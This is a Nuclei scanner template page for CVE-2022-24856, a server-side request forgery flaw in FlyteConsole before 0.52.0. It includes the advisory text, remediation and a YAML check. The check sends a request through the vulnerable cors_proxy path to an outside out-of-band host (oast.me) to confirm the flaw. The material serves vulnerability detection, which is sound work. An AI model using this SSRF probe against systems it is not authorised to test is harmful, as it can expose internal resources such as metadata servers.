Skip to content
Nuclei Templates

Flyte Console <0.52.0 - Server-Side Request Forgery

ID: CVE-2022-24856

Severity: high

Author: pdteam

Tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte

Description

Section titled “Description”

FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.

YAML Source

Section titled “YAML Source”
id: CVE-2022-24856


info:
  name: Flyte Console <0.52.0 - Server-Side Request Forgery
  author: pdteam
  severity: high
  description: |
    FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.
  impact: |
    An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks.
  remediation: |
    The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole.
  reference:
    - https://github.com/flyteorg/flyteconsole/security/advisories/GHSA-www6-hf2v-v9m9
    - https://github.com/flyteorg/flyteconsole/pull/389
    - https://hackerone.com/reports/1540906
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24856
    - https://github.com/flyteorg/flyteconsole/commit/05b88ed2d2ecdb5d8a8404efea25414e57189709
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24856
    cwe-id: CWE-918
    epss-score: 0.08397
    epss-percentile: 0.94394
    cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: flyte
    product: flyte_console
  tags: cve2022,cve,flyteconsole,ssrf,oss,hackerone,flyte


http:
  - method: GET
    path:
      - "{{BaseURL}}/cors_proxy/https://oast.me/"


    matchers:
      - type: word
        words:
          - "Interactsh Server"
# digest: 490a00463044022021e2fb75b910ee3f62772dff7ff7405e21d6ff360a0a3589fe8bd2805830a909022056f5bba94c1736db2aa57ca845378e62140da8481d68f25d403b488512874544:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24856.yaml"

View on Github